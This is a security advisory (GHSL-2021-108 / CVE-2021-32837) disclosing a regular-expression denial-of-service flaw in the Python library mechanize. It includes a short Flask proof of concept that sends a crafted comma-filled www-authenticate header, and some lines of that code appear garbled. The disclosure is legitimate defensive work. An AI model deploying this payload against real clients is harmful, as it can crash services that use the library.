skip to content
Back to
Home Bounties Research Advisories Get Involved Events
September 9, 2021

GHSL-2021-108: ReDoS (Regular Expression Denial of Service) in mechanize - CVE-2021-32837

Kevin Backhouse

Coordinated Disclosure Timeline


mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).



Tested Version




ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on mechanize by following this link.


The vulnerable regular expression is here.

mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.

The reproduction steps below first start a webserver, and then starts mechanize. You can try to delete the resp.headers[... line to see how mechanize should behave.

from flask import Flask, make_response
app = Flask(__name__)

def home():
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp

if __name__ == "__main__":, port=8080)
import mechanize 

br = mechanize.Browser()
br.add_password("http://localhost:8080", "admin", "password")"http://localhost:8080")


This issue may lead to a denial of service.



This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).


You can contact the GHSL team at, please include a reference to GHSL-2021-108 in any communication regarding this issue.